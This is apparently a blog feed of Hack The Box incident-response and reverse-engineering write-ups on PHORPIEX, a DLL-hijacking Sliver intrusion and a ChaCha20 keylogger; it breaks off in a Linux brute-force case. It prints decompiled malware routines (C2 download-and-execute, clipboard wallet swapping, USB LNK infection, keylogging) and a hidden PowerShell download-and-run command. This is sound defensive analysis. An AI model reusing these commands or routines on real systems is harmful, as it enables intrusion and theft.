(40+ additional altcoin addresses) - I think the sample monitors the clipboard for crypto addresses via the SetClipboardViewer chain and replaces the victim\u0026rsquo;s copied address with the attacker\u0026rsquo;s corresponding wallet\nrunning in Sandbox # optimize.exe\noptimize.exe acts as a dropper: it downloads syscrondvr.exe and sets a registry value in HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run to start syscrondvr.exe at logon.\nsyscrondvr.exe\nsyscrondvr.exe was identified as PHORPIEX by Yara and Suricata. It uses a tbtnds.dat file, likely to store configuration data, and makes a lot of interesting connections to 185.156.72.39:80 and to some other IPs on port 4500.\nreversing with ida # persistence by \\Run\\ registry key # The malware copies itself to %windir%, %USERPROFILE% and %temp%, renaming the copy to syscrondvr.exe. It adds a Run value under HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ and HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\, then changes the attributes of the file to hide it.\n1int start() 2{ 3 GetModuleFileNameW(0, \u0026amp;ExistingFileName, 0x105u);// return a filepath 4 String1 = PathFindFileNameW(\u0026amp;ExistingFileName);// return filename from filepath 5// ...[snip]... 6// 7 ExpandEnvironmentStringsW(L\u0026#34;%windir%\u0026#34;, mw_windir, 0x104u); 8 wsprintfW(NewFileName, L\u0026#34;%s\\\\%s\u0026#34;, mw_windir, L\u0026#34;syscrondvr.exe\u0026#34;); 9 if ( CopyFileW(\u0026amp;ExistingFileName, NewFileName, 0) ) 10 { 11 SetFileAttributesW(NewFileName, 3u); // FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN 12 v13 = RegOpenKeyExW( 13 HKEY_LOCAL_MACHINE, 14 L\u0026#34;Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\u0026#34;, 15 0, 16 0x20006u, 17 \u0026amp;phkResult); 18 if ( !v13 ) 19 { 20 v0 = wcslen(NewFileName); 21 if ( !RegSetValueExW(phkResult, aWindowsSetting, 0, 1u, NewFileName, 2 * v0 + 2) ) // REG_SZ value pointing at the copy 22//...[snip]... 
23 v13 = RegOpenKeyExW( 24 HKEY_CURRENT_USER, 25 L\u0026#34;Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\u0026#34;, 26 0, 27 0x20006u, 28 \u0026amp;phkResult); 29 if ( !v13 ) 30 { 31 v1 = wcslen(String); 32 if ( !RegSetValueExW(phkResult, aWindowsSetting, 0, 1u, String, 2 * v1 + 2) ) 33//...[snip]... bypass MotW # Bypasses Mark of the Web by building the path of its own file\u0026rsquo;s :Zone.Identifier alternate data stream and deleting it.\n1 wsprintfW(FileName, L\u0026#34;%s:Zone.Identifier\u0026#34;, \u0026amp;ExistingFileName); 2 DeleteFileW(FileName); // removes the MotW stream, not the file itself configure commands and C2 servers # Configure paths:\n- tbtnds.dat: \u0026ldquo;Trik Bot Nodes\u0026rdquo; — list of C2 servers\n- tbtcmds.dat: \u0026ldquo;Commands\u0026rdquo; — commands retrieved from C2\n1 wsprintfW(\u0026amp;word_4161D0, L\u0026#34;%s\\\\tbtnds.dat\u0026#34;, mw_userprofile); 2 wsprintfW(\u0026amp;::FileName, L\u0026#34;%s\\\\tbtcmds.dat\u0026#34;, mw_userprofile); main C2 logic # Creates a thread with CreateThread(0, 0, mw_C2_main_loop, 0, 0, 0);. That thread functions as the C2 loop. It iterates through 2 hardcoded IP addresses (http://185.156.72.39/ and http://45.141.233.6/) combined with 5 distinct URI suffixes (\u0026ldquo;1\u0026rdquo; to \u0026ldquo;5\u0026rdquo;), generating a total of 10 potential endpoints per cycle (e.g., http://185.156.72.39/1).\nThe function calls mw_download_and_execute() to retrieve the file (InternetOpenUrlW + InternetReadFile + WriteFile, or URLDownloadToFileW) and run the executable (ShellExecute). 
The loop has a Sleep(0xDBBA0u) call, enforcing a 15-minute beacon interval.\n1void __stdcall __noreturn mw_C2_main_loop(PVOID Parameter) 2{ 3 memset(v5, 0, sizeof(v5)); 4 v4[0] = \u0026#34;1\u0026#34;; 5 v4[1] = \u0026#34;2\u0026#34;; 6 v4[2] = \u0026#34;3\u0026#34;; 7 v4[3] = \u0026#34;4\u0026#34;; 8 v4[4] = \u0026#34;5\u0026#34;; 9 while ( 1 ) 10 { 11 for ( i = 0; i \u0026lt; 2; ++i ) 12 { 13 Sleep(0x3E8u); 14 for ( j = 0; j \u0026lt; 5; ++j ) 15 { 16 Sleep(0x3E8u); 17 wsprintfA(szUrlName, \u0026#34;%s%s\u0026#34;, mw_http_ip[i], v4[j]); 18 DeleteUrlCacheEntry(szUrlName); 19 if ( mw_payload_checks(szUrlName, \u0026amp;v5[j]) == 1 ) 20 mw_download_and_execute(szUrlName, 0); 21 } 22 } 23 Sleep(0xDBBA0u); 24 } 25} Replace a crypt # Creates a Thread CreateThread(0, 0, mw_main_replace, 0, 0, 0);, which creates a callback function mw_WindProc_callback_.\n1v4.cbSize = 48; 2 v4.lpfnWndProc = mw_WindProc_callback_; 3 v4.hInstance = GetModuleHandleW(0); 4 v4.lpszClassName = v3; This function checks if clipboard data was updated (WM_DRAWCLIPBOARD), then uses IsClipboardFormatAvailable to check a format of clipboard data, GetClipboardData to get a descriptor of data, GlobalLock to get a pointer to clipboard data, then does some conversion of this data to the necessary format and transfers data to mw_repcale_crypt function\n1switch ( Msg ) 2 { 3 case 0x308u: // 0x308 -\u0026gt; WM_DRAWCLIPBOARD 4 uFormat = 0; 5 if ( IsClipboardFormatAvailable(0xDu) ) // unicode text 6 { 7 uFormat = 13; 8 } 9 else if ( IsClipboardFormatAvailable(1u) )// asci 10 { 11 uFormat = 1; 12 } 13 else if ( IsClipboardFormatAvailable(7u) )// CF_OEMTEXT 14 { 15 uFormat = 7; 16 } 17 if ( uFormat \u0026amp;\u0026amp; OpenClipboard(0) ) 18 { 19 hMem = GetClipboardData(uFormat); 20 mw_ptr_to_pdata = GlobalLock(hMem); 21 lpString = 0; 22 if ( uFormat == 1 ) 23 { 24 lpString = mw_convert_to_wide(mw_ptr_to_pdata, 0, 0); 25 } 26 else if ( uFormat == 7 ) 27 { 28 lpString = mw_convert1(mw_ptr_to_pdata, 0, 0); 29 } 
30 else 31 { 32 lpString = mw_convert2(mw_ptr_to_pdata, 0); 33 } 34 mw_repcale_crypt(lpString); 35// ...[snip]... The mw_repcale_crypt function checks whether the user\u0026rsquo;s clipboard data contains a crypto wallet address and, if so, replaces it with the attacker\u0026rsquo;s own wallet.\n1if ( StrStrW(lpString, L\u0026#34;bitcoincash:\u0026#34;) ) 2// ...[snip]... 3if ( *lpString == 84 ) // first char \u0026#39;T\u0026#39; 4 v5 = \u0026#34;TW3wpRJmZgC5WifuY468JBUCF3TEkzBT5H\u0026#34;; 5// ...[snip]... 6if ( lpString[1] == 105 \u0026amp;\u0026amp; lpString[2] == 108 ) // \u0026#39;i\u0026#39;,\u0026#39;l\u0026#39; -\u0026gt; \u0026#34;zil\u0026#34; prefix 7 v5 = \u0026#34;zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3\u0026#34;; 8 else 9 v5 = \u0026#34;zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v\u0026#34;; 10// ...[snip]... 11mw_prt_to_replaced_pdata = GlobalLock(hMem); 12 if ( mw_prt_to_replaced_pdata ) 13 { 14 memcpy(mw_prt_to_replaced_pdata, v5, v4 + 1); // overwrite buffer with attacker wallet 15 GlobalUnlock(hMem); 16 if ( OpenClipboard(0) ) 17 { 18 EmptyClipboard(); 19 SetClipboardData(1u, hMem); // CF_TEXT spreading via USB and network drives # The malware creates a separate thread with CreateThread(0, 0, sub_406E00, 0, 0, 0); for monitoring connected drives and automatically spreading via USB drives and network shares.\nThe function continuously checks the system\u0026rsquo;s logical drives (mw_checks_logical_drives()), filtering for USB and network devices. 
For each detected drive, it collects information about size and volume name, then calls sub_4068E0() for infection:\n1void __stdcall __noreturn sub_406E00(PVOID Parameter) 2{ 3 GetModuleFileNameW(0, \u0026amp;Filename, 0x104u); 4 mw_current_file_size = sub_40EA80(\u0026amp;Filename); 5 while ( 1 ) 6 { 7 v9 = mw_checks_logical_drives(); 8 for ( i = 2; i \u0026lt;= 25; ++i ) // drive letters C: to Z: 9 { 10 v7 = sub_4064E0(v9, i, RootPathName); 11 if ( v7 == 2 || v7 == 4 ) // if USB or network drive 12 { 13 GetVolumeInformationW(RootPathName, VolumeNameBuffer, 0x105u, 0, 0, \u0026amp;FileSystemFlags, 0, 0); 14 GetDiskFreeSpaceExW(RootPathName, 0, \u0026amp;TotalNumberOfBytes, 0); 15 wsprintfW(v5, L\u0026#34; (%dGB)\u0026#34;, TotalNumberOfBytes.QuadPart / 0x40000000); 16 if ( !VolumeNameBuffer[0] ) 17 wsprintfW(VolumeNameBuffer, L\u0026#34;Unnamed volume\u0026#34;); 18 wsprintfW(v4, L\u0026#34;%s%s\u0026#34;, VolumeNameBuffer, v5); 19 sub_4068E0(RootPathName, v4, FileSystemFlags, v7 == 4); usb infect # Infection works by:\n- Creating a hidden directory named after the volume\n- Copying the malware as DriveSecManager.exe with the HIDDEN attribute\n- Creating an LNK shortcut with a folder icon\n- Moving all user files into the hidden directory\n- Leaving only the malicious LNK visible\n1if ( !PathFileExistsW(pszPath) ) 2 { 3 if ( !PathFileExistsW(PathName) \u0026amp;\u0026amp; CreateDirectoryW(PathName, 0) ) 4 SetFileAttributesW(PathName, 2u); // FILE_ATTRIBUTE_HIDDEN 5 if ( PathFileExistsW(PathName) \u0026amp;\u0026amp; CopyFileW(\u0026amp;Filename, pszPath, 0) ) 6 SetFileAttributesW(pszPath, 2u); 7 } 8 if ( !PathFileExistsW(FileName) ) 9 { 10 if ( a4 ) 11 sub_406680(FileName, L\u0026#34;shell32.dll\u0026#34;, 9); // network drive 12 else 13 sub_406680(FileName, L\u0026#34;shell32.dll\u0026#34;, 8); // USB drive 14 SetFileAttributesW(FileName, 1u); // FILE_ATTRIBUTE_READONLY 15 } The user saw what looked like a normal folder icon, but it was actually an LNK file that executed the malware.\nMalicious LNK # Used the COM interface IShellLink 
to create LNK that:\n- Displayed folder icon from shell32.dll\n- Launched cmd.exe with command to open hidden folder and run malware\n- Victim saw files (hidden directory opened) while malware executed in background\n1void __cdecl sub_406680(int a1, int a2, int a3) 2{ 3 v6 = CoInitialize(0); 4 if ( v6 \u0026gt;= 0 ) 5 { 6 v6 = CoCreateInstance(\u0026amp;rclsid, 0, 1u, \u0026amp;riid, \u0026amp;ppv); // creates IShellLink object 7 if ( v6 \u0026gt;= 0 \u0026amp;\u0026amp; ppv ) 8 { 9 // command: open hidden folder + launch malware 10 wsprintfW(v3, L\u0026#34;/c start %s \u0026amp; start %s\\\\DriveSecManager.exe\u0026#34;, \u0026amp;unk_41430C, \u0026amp;unk_41430C); 11// ...[snip]... UPnP NAT Traversal # Implemented NAT traversal to expose infected machine to internet by configuring router port forwarding via UPnP.\nFound gateway via SSDP multicast. Sent M-SEARCH request to 239.255.255.250:1900 to discover InternetGatewayDevice:\n1int __cdecl mw_gateway_find_by_SSDP(_DWORD *a1) 2{ 3 v17 = WS2_32_23(2, 2, 17); 4 if ( v17 != -1 ) 5 { 6 v4[1] = WS2_32_9(1900); // port 1900 (SSDP) 7 v5 = WS2_32_11(\u0026#34;239.255.255.250\u0026#34;); // SSDP multicast address 8 WS2_32_21(v17, 0xFFFF, 32, \u0026amp;v14, 1); // SO_BROADCAST 9 lpString = \u0026#34;M-SEARCH * HTTP/1.1\\r\\n\u0026#34; 10 \u0026#34;ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1\\r\\n\u0026#34; 11 \u0026#34;MX: 3\\r\\n\u0026#34; 12 \u0026#34;Man:\\\u0026#34;ssdp:discover\\\u0026#34;\\r\\n\u0026#34; 13 \u0026#34;HOST: 239.255.255.250:1900\\r\\n\u0026#34; 14 \u0026#34;\\r\\n\u0026#34;; 15// ...[snip]... Collected UPnP gateway URLs from responses, then configured port forwarding. 
Determined local IP via getsockname() by connecting to www.update.microsoft.com, then forwarded port 40500:\n1unsigned int mw_nat_local() 2{ 3 CoInitializeEx(0, 2u); 4 v3 = 0; 5 result = mw_gateway_find_by_SSDP(\u0026amp;v3); 6 v4 = result; 7 if ( result ) 8 { 9 for ( i = 0; i \u0026lt; v4; ++i ) 10 { 11 lpszUrl = sub_40DC90(*(v3 + 4 * i)); // get UPnP control URL 12 if ( lpszUrl ) 13 { 14 v1 = mw_local_ip(); 15 sub_40E780(lpszUrl, \u0026#34;TCP\u0026#34;, 0x9E34u, v1); // TCP port 40500 16 sub_40E780(lpszUrl, \u0026#34;UDP\u0026#34;, 0x9E34u, v1); // UDP port 40500 17// ...[snip]... ","date":"February 8, 2026","externalUrl":null,"permalink":"/investigations/htb-lupin/","section":"","summary":"Reverse engineering PHORPIEX dropper - analyzing clipboard hijacking, USB spreading, and UPnP NAT traversal techniques.","title":"HTB-Lupin","type":"investigations"},{"content":"","date":"February 8, 2026","externalUrl":null,"permalink":"/tags/motw-bypass/","section":"Tags","summary":"","title":"MotW Bypass","type":"tags"},{"content":"","date":"February 8, 2026","externalUrl":null,"permalink":"/tags/nat-traversal/","section":"Tags","summary":"","title":"NAT Traversal","type":"tags"},{"content":"","date":"February 8, 2026","externalUrl":null,"permalink":"/tags/phorpiex/","section":"Tags","summary":"","title":"PHORPIEX","type":"tags"},{"content":"","date":"February 8, 2026","externalUrl":null,"permalink":"/tags/upnp-exploitation/","section":"Tags","summary":"","title":"UPnP Exploitation","type":"tags"},{"content":"","date":"February 8, 2026","externalUrl":null,"permalink":"/tags/usb-spreading/","section":"Tags","summary":"","title":"USB Spreading","type":"tags"},{"content":"","date":"February 5, 2026","externalUrl":null,"permalink":"/tags/cve-2024-6473/","section":"Tags","summary":"","title":"CVE-2024-6473","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-05 TL;DR # Administrator executed a malicious shortcut that triggered a hidden PowerShell command, 
downloading and executing a payload and gaining shell access. The attacker enumerated installed software, identified a vulnerable Yandex Browser (CVE-2024-6473), and exploited DLL hijacking by planting a malicious library that acts as a dropper. This dropper deployed a Sliver C2 implant, establishing persistence via a scheduled task and maintaining communication with the C2.\nWhat we\u0026rsquo;ve got # 1. 2├── $Boot 3├── $Extend 4├── $LogFile 5├── $MFT 6├── $Secure_$SDS 7├── ProgramData 8├── Users 9└── Windows Initial analysis # malicious shortcut # By using Registry Explorer I identified that at 2025-01-26 16:17:15 the Administrator executed the shortcut 2025-GiveAways.lnk:\n1Program Name\tRun Last Executed 2C:\\Users\\Administrator\\Downloads\\2025-GiveAways.lnk\t1\t2025-01-26 16:17:15 shell access # By looking at the execution time, I identified that the shortcut executed a PowerShell command. That command downloaded and executed a malicious file, svch0st.exe, in the C:\\Temp\\ folder.\n2025-01-26 16:17:16\n1C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit -WindowStyle Hidden -Command if (!(Test-Path C:\\Temp)) { New-Item -ItemType Directory -Path C:\\Temp }; if (Test-Path C:\\Temp\\svchost.exe) { Remove-Item -Path C:\\Temp\\svchost.exe -Force }; Invoke-WebRequest -Uri \u0026#34;https://github.com/M4shl3/okiii/raw/main/svchost.exe\u0026#34; -OutFile \u0026#34;C:\\Temp\\svch0st.exe\u0026#34;; Start-Process -FilePath \u0026#34;C:\\Temp\\svch0st.exe\u0026#34;; Start-Sleep -Seconds 1800; Stop-Process -Name svch0st -Force; Remove-Item -Path C:\\Temp\\svch0st.exe -Force At 2025-01-26 16:17:54, the payload was executed and the attacker gained shell access. 
This was determined in \u0026quot;C:\\Users\\s\\Desktop\\C\\Windows\\prefetch\\SVCH0ST.EXE-9311C47D.pf\u0026quot; by using PECmd.exe.\nenumeration # At 2025-01-26 16:19:29 he started checking installed packages on the system, most likely to find an application with vulnerabilities.\n1C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command Get-Package I checked how the cmdlet Get-Package works and determined that it uses Package Providers to check specific registry keys, such as:\n1HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall 2HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall 3HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall I checked all of them and found YandexBrowser 24.4.5.498, which is vulnerable to CVE-2024-6473.\nPersistence # CVE-2024-6473 # Yandex Browser for Desktop before 24.7.1.380 has a DLL Hijacking Vulnerability because an untrusted search path is used.\nIn C:\\Windows\\System32\\Tasks I found the task *Update for Yandex Browser, which executes C:\\Users\\Administrator\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe on startup, and this binary uses the wldp.dll library.\nThis library was downloaded at 2025-01-26 16:36:12 from 18.192.12.126:8000. I found this by analysing CryptnetUrlCache from C:\\Users\\Administrator\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData. I extracted this malicious DLL and started analysing it.\n1wldp.dll\t.\\Users\\Administrator\\AppData\\Local\\Yandex\\YandexBrowser\\Application\tSHA256: a1a17ebd90610d808e761811d17da3143f3de0d4cc5ee92bd66000dca87d9270 I found that at 2025-01-26 16:36:55 from the same IP, another file yanda.tmp was downloaded:\n1http://18.192.12.126:8000/yanda.tmp Dropper # wldp.dll # The file masquerading as wldp.dll functions as a dropper. 
It creates a mutex, then checks whether Yandex Browser is running and, if not, launches it; it then calls Sleep (10,000 ms) to delay execution, potentially bypassing sandbox analysis, and executes the main C2 payload located at C:\\Users\\Administrator\\AppData\\Local\\Temp\\yanda.tmp:\n1__int64 sub_1800748E0() 2{ 3//...[snip]... 4 hObject = CreateMutexW(0, 1, L\u0026#34;Global\\\\YandaExeMutex\u0026#34;); // creates a mutex 5 if ( !hObject 6 || GetLastError() == 183 7 || (StartupInfo.cb = 104, 8 memset(\u0026amp;StartupInfo.lpReserved, 0, 0x60u), 9 lpStartupInfo.cb = 104, 10 memset(\u0026amp;lpStartupInfo.lpReserved, 0, 0x60u), 11 (v12 = FindWindowW(0, L\u0026#34;Yandex Browser\u0026#34;)) != 0) ) // checks if Yandex Browser is running 12 { 13 CloseHandle(hObject); 14 } 15 else 16 { 17 CreateProcessW( 18 L\u0026#34;C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Yandex\\\\YandexBrowser\\\\Application\\\\browser.exe\u0026#34;, 19 0, 0, 0, 1, 0, 0, 0, \u0026amp;StartupInfo, \u0026amp;ProcessInformation); // run Yandex 20 Sleep(0x2710u); 21 WindowW = FindWindowW(0, L\u0026#34;yanda.tmp\u0026#34;); 22 v12 = WindowW; 23 if ( !WindowW ) 24 { 25 v13 = 1; 26 CreateProcessW( 27 L\u0026#34;C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\yanda.tmp\u0026#34;, // run yanda.tmp (PE file) 28 0, 0, 0, 1, 0, 0, 0, \u0026amp;StartupInfo, \u0026amp;ProcessInformation); 29 Sleep(0x3E8u); 30 } 31//...[snip]... 32 TerminateProcess(CurrentProcess, 0); 33 } 34 return sub_180070742(v5, \u0026amp;unk_180155D10); 35} At 2025-01-26 16:38:33, a command was executed with this message:\n1powershell.exe echo You Got Pwnd C2 implant # Yanda.tmp # yanda.tmp is an obfuscated Go binary. 
After analyzing it in a sandbox, I determined it is a client for the Sliver C2 Framework that establishes connections to 18.192.12.126:8888. Attack Timeline # 12025-01-26 16:17:15 - Administrator executed malicious shortcut 2025-GiveAways.lnk from Downloads folder 22025-01-26 16:17:16 - PowerShell command executed to download and run svch0st.exe 32025-01-26 16:17:54 - Malicious payload svch0st.exe executed, attacker gained initial shell access 42025-01-26 16:19:29 - Attacker enumerated installed packages using Get-Package cmdlet 52025-01-26 16:36:12 - Malicious wldp.dll downloaded from 18.192.12.126:8000 62025-01-26 16:36:55 - Secondary payload yanda.tmp downloaded from 18.192.12.126:8000 7Ongoing - Persistence via Yandex Browser scheduled task and DLL hijacking 8Ongoing - C2 communication established to 18.192.12.126:8888 via Sliver framework IOCs # Network\n- C2 Server: 18.192.12.126\n- C2 HTTP: 8000/tcp\n- C2 Sliver: 8888/tcp\nFiles\n- C:\\Users\\Administrator\\Downloads\\2025-GiveAways.lnk\n- C:\\Temp\\svch0st.exe\n- C:\\Users\\Administrator\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\wldp.dll\n- C:\\Users\\Administrator\\AppData\\Local\\Temp\\yanda.tmp\nScheduled Tasks\n- C:\\Windows\\System32\\Tasks\\Update for Yandex Browser\nVulnerable Software\n- YandexBrowser 24.4.5.498\nRecommendations # Immediate Actions\nIsolate the compromised system from the network immediately Block IP address 18.192.12.126 on all firewalls and network perimeters Terminate any running processes: svch0st.exe, yanda.tmp Remove malicious scheduled task: Update for Yandex Browser Delete malicious files: C:\\Temp\\svch0st.exe C:\\Users\\Administrator\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\wldp.dll C:\\Users\\Administrator\\AppData\\Local\\Temp\\yanda.tmp C:\\Users\\Administrator\\Downloads\\2025-GiveAways.lnk Reset Administrator account password Software\nUpdate Yandex Browser Enable AppLocker ","date":"February 5, 
2026","externalUrl":null,"permalink":"/investigations/htb-easymoney/","section":"","summary":"Administrator executed a malicious shortcut that triggered a hidden PowerShell command, downloading and executing a payload and gaining shell access. The attacker enumerated installed software, identified a vulnerable Yandex Browser (CVE-2024-6473), and exploited DLL hijacking by planting a malicious library that acts as a dropper. This dropper deployed a Sliver C2 implant establishing persistence via a scheduled task and maintaining communication","title":"HTB-EasyMoney","type":"investigations"},{"content":"","date":"February 3, 2026","externalUrl":null,"permalink":"/tags/chacha20/","section":"Tags","summary":"","title":"ChaCha20","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-03 Description:\nTL;DR # This malware is a targeted keylogger written in C++ (MinGW) that monitors specific applications (e.g., Google Chrome). It generates a unique session key from the victim\u0026rsquo;s MachineGuid, removes dashes to form a 32-byte key, and uses ChaCha20 to encrypt keystrokes. The encrypted data is exfiltrated over a raw TCP connection to a C2 server using an IRC-like protocol, posting into the #key_storrage channel. 
The malware ensures persistence by copying itself to the %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup folder and employs anti-debugging techniques by decrypting critical strings only when no debugger is detected.\ninitial analysis # 1$ file * 2cap.pcapng: pcapng capture file - version 1.0 3SneakyKeys.exe: PE32+ executable for MS Windows 5.02 (console), x86-64 (stripped to external PDB), 11 sections imports # This malware sample imports a variety of Windows API functions that reveal its capabilities and potential behaviors:\nProcess and Thread Manipulation\nOpenProcess - potential process injection\nVirtualProtect - shellcode injection or code unpacking\nVirtualQuery - potential process injection\nNetwork (WS2_32.dll) full networking stack for C2 communication\nKeylogging strings # 1172.25.21.54 - hardcoded IP address 2My_dUp3r_sup3r_kon3_n0nc - hardcoded encryption key 3chacha20.h - ChaCha20 stream cipher implementation 4#key_storrage - IRC channel used for keystroke exfiltration reversing # I decompiled the main function and renamed subroutines based on their functionality:\n1__int64 mw_main() 2{ 3 mw_key_hook(); // sets up the keyboard hook 4 mw_registry(mw_ptr_to_uuid); // retrieves MachineGuid 5 sub_1400B1FC0(qword_14010A260, mw_ptr_to_uuid); // stores UUID globally 6 mw_jfree(mw_ptr_to_uuid); 7 8 // decrypts username using static key 9 mw_antidebug_decrypt(mw_username, 8, \u0026amp;unk_1400D4020); 10 v0 = sub_1400307D0(mw_username); 11 12 mw_copy_to_startup_folder(); // persistence 13 mw_start_irc(v5, qword_14010A260); // connects to C2 14} mw_key_hook() The hook installation confirms the keylogging behavior:\n1 hhk = SetWindowsHookExA(13, fn, 0, 0); // 13 = WH_KEYBOARD_LL The callback function fn() contains the core logic:\n- checks if the active window title contains \u0026ldquo;Google Chrome\u0026rdquo;\n- If a standard key is pressed, it\u0026rsquo;s added to a buffer\n- If ENTER is pressed, the buffer is encrypted and sent\n1LRESULT 
__fastcall fn(int code, WPARAM wParam, KBDLLHOOKSTRUCT *lParam) 2{ 3 if ( !code \u0026amp;\u0026amp; (wParam == 256 || wParam == 260) ) // WM_KEYDOWN 4 { 5 mw_window_title(v16); // captures the active window title for context 6 mw_antidebug_decrypt(v21, 13, \u0026amp;unk_1400D4040); // decrypts Google Chrome 7//...[snip]... 8 sub_1400CF8B0(v33, v34, \u0026#34; \u0026#34;); 9 sub_1400CF8B0(v32, v33, \u0026#34;#key_storrage\u0026#34;); // tags the message with the IRC channel 10 sub_1400CF8B0(v31, v32, \u0026#34; :\u0026#34;); 11//...[snip]... 12 mw_send(s, v30); 13 } 14 else 15 { 16 sub_1400B2390(\u0026amp;unk_14010A280, vkCode); // buffer 17 } cryptography # The malware uses ChaCha20 for two purposes with different keys:\nconfig decryption # Uses a hardcoded static key found in .data to decrypt strings like \u0026ldquo;Google Chrome\u0026rdquo; and C2 commands. 1Key: 4D795F64557033725F73757033725F6B6F6E335F6E306E63291A000000000000 2Nonce: 6F6E335F6E306E63 (on3_n0nc) keystroke decryption # Uses a dynamic key (UUID) derived from the victim\u0026rsquo;s machine. The mw_registry() function retrieves MachineGuid from HKLM\\SOFTWARE\\Microsoft\\Cryptography and stores it in qword_14010A260: 1//...[snip]... 2 v27 = 45; 3 v26 = sub_1400CDAF0(v5, v4, \u0026amp;v27); 4 mw_start_uuid = sub_1400AEE90(qword_14010A260); // qword_14010A260 - UUID 5 mw_end_uuid = sub_1400AF4B0(qword_14010A260); 6 sub_1400AD050(v20, mw_end_uuid, mw_start_uuid, \u0026amp;v28); 7 v10 = sub_1400AD020(v20); 8 mw_chacha20(v18, v10, \u0026amp;unk_1400D4010, 0); // encrypts keystroke with uuid key 9//...[snip]... persistence # mw_copy_to_startup_folder() — achieves persistence by copying the malware executable into the %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup folder.\n1 if ( SHGetFolderPathA(0, 7, 0, 0, pszPath) ) // 7 = CSIDL_STARTUP 2 return -1; 3 mw_antidebug_crypt(v7, 8, \u0026amp;unk_1400D4028); // decrypts gg.exe 4//...[snip]... 
5 if ( GetModuleFileNameA(0, Filename, 0x104u) ) 6 { 7 if ( CopyFileA(Filename, v2, 0) ) // copies self → Startup\\gg.exe communication with c2 # mw_start_irc() — connects to the C2 server over a raw TCP socket and communicates using a lightweight IRC-like protocol. The client registers itself using the victim\u0026rsquo;s MachineGuid as the nickname, then enters a loop that receives commands and sends encrypted keystroke data into the #key_storrage channel.\ndecryption # Analysing the PCAP capture we identified Alice\u0026rsquo;s IRC session. Her client registered with the following nickname and user string, which exposes her full MachineGuid:\n1NICK ALICE_9d9a51bf 2USER ALICE_9d9a51bf 0 * :Client with id:9d9a51bf-b38f-4964-99ad-31c1249d5a70 The MachineGuid is 9d9a51bf-b38f-4964-99ad-31c1249d5a70. Stripping dashes gives the 32-byte ChaCha20 key: 9d9a51bfb38f496499ad31c1249d5a70. The nonce is the hardcoded on3_n0nc. Several encrypted keystroke messages were captured in the #key_storrage channel:\n1PRIVMSG #key_storrage :0b8fda0526231ab7 2PRIVMSG #key_storrage :0e8bca69d22f1db404802cc6eb5234fbd7598f71914d74a386e6ddd55b3eb005c78c4d4a75fa6b519b196ea9d85438001d244e06b8401b 3PRIVMSG #key_storrage :0b97b31ed73211aa768c5fd4862226edca4a896d924d64bff387c5d45128a113c5 4PRIVMSG #key_storrage :1681c01dcb2307b3749d2ccce337379ed049e67d93397aa99688a9c841 The following Python script decrypts the messages using PyCryptodome:\n1from Crypto.Cipher import ChaCha20 2key = \u0026#34;9d9a51bfb38f496499ad31c1249d5a70\u0026#34;.encode(\u0026#39;utf-8\u0026#39;) 3nonce = b\u0026#34;on3_n0nc\u0026#34; 4cipher = ChaCha20.new(key=key, nonce=nonce) 5 6ciphertext = bytes.fromhex(\u0026#34;0b97b31ed73211aa768c5fd4862226edca4a896d924d64bff387c5d45128a113c5\u0026#34;) 7print(cipher.decrypt(ciphertext)) 1$ python3 dec.py 2b\u0026#39;MY WORDPRESS PASSWORD IS ALICE1SO\u0026#39; ","date":"February 3, 
2026","externalUrl":null,"permalink":"/investigations/htb-sneakykeys/","section":"","summary":"","title":"HTB-SneakyKeys","type":"investigations"},{"content":" Difficulty: Easy OS: Linux Date: 2026-02-02 Description The IT Manager of Techniqua-Solutions Corp. is responsible for managing the company’s infrastructure. As part of his daily work, he frequently accesses company servers and workstations. One morning, the IT Manager discovered that several critical company files were missing, while others had been modified or replaced with unfamiliar ones. Concerned about a potential breach, he reported the issue to the security team.\nAs an incident response analyst, your task is to investigate the case. You have been provided with a forensic image of the IT Manager’s machine.\nwhat we\u0026rsquo;ve got # 1├── bodyfile 2│ └── bodyfile.txt 3├── hash_executables 4│ ├── hash_executables.md5 5│ └── hash_executables.sha1 6├── live_response 7│ ├── hardware 8│ ├── network 9│ ├── packages 10│ ├── process 11│ ├── storage 12│ └── system 13└── [root] 14 ├── etc 15 ├── home 16 ├── lib 17 ├── root 18 ├── run 19 ├── snap 20 ├── tmp 21 ├── usr 22 └── var first access # The attacker started brute-forcing at 2025-02-10 19:38:18 from 192.168.161.198.\nauth.log:\n1LuckyShot sshd[12985]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.161.198 user=root 2LuckyShot sshd[12984]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.161.198 user=root 3LuckyShot sshd[12993]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192... 
